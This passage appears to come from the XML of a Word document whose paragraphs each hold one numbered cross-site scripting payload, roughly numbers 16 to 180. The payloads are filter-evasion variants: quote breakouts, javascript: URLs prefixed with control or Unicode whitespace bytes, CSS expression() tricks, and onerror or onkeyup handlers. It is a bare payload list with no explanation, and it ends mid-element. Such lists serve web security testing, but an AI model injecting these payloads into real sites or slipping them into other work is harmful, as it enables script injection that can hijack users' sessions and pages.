        <w:t xml:space="preserve">‘;alert(16);t=’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">JavaSCript:alert(17)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">;alert(18);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">src=JaVaSCript:prompt(19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“&gt;&lt;script&gt;alert(20);&lt;/script x=”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‘&gt;&lt;script&gt;alert(21);&lt;/script x=’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">" autofocus onkeyup="javascript:alert(23)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' autofocus onkeyup='javascript:alert(24)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x\x3Aexpression(javascript:alert(34)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:expression\x5C(javascript:alert(35)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:expression\x00(javascript:alert(36)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:exp\x00ression(javascript:alert(37)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x09expression(javascript:alert(40)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x20expression(javascript:alert(50)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x00expression(javascript:alert(52)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x05javascript:javascript:alert(64)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x18javascript:javascript:alert(66)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x11javascript:javascript:alert(67)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x17javascript:javascript:alert(71)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x03javascript:javascript:alert(72)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x00javascript:javascript:alert(75)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x10javascript:javascript:alert(76)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x20javascript:javascript:alert(78)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x13javascript:javascript:alert(79)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x09javascript:javascript:alert(80)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x14javascript:javascript:alert(82)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x19javascript:javascript:alert(83)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x81javascript:javascript:alert(86)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Djavascript:javascript:alert(87)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x87javascript:javascript:alert(88)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x07javascript:javascript:alert(89)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x04javascript:javascript:alert(92)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x01javascript:javascript:alert(93)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x08javascript:javascript:alert(94)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x12javascript:javascript:alert(98)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Djavascript:javascript:alert(99)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Ajavascript:javascript:alert(100)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Cjavascript:javascript:alert(101)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x15javascript:javascript:alert(102)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x16javascript:javascript:alert(104)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x02javascript:javascript:alert(105)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Bjavascript:javascript:alert(106)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x06javascript:javascript:alert(107)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Ejavascript:javascript:alert(110)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Cjavascript:javascript:alert(112)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x00:javascript:alert(113)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x3A:javascript:alert(114)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x09:javascript:alert(115)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x0D:javascript:alert(116)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x0A:javascript:alert(117)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x00src=x onerror="alert(165)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x47src=x onerror="javascript:alert(166)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x11src=x onerror="javascript:alert(167)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x12src=x onerror="javascript:alert(168)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x47src=x onerror="javascript:alert(169)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x10src=x onerror="javascript:alert(170)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x13src=x onerror="javascript:alert(171)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x32src=x onerror="javascript:alert(172)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x47src=x onerror="javascript:alert(173)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x11src=x onerror="javascript:alert(174)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x47src=x onerror="javascript:alert(175)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x34src=x onerror="javascript:alert(176)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x39src=x onerror="javascript:alert(177)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x00src=x onerror="javascript:alert(178)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x09=x onerror="javascript:alert(179)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x10=x onerror="javascript:alert(180)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
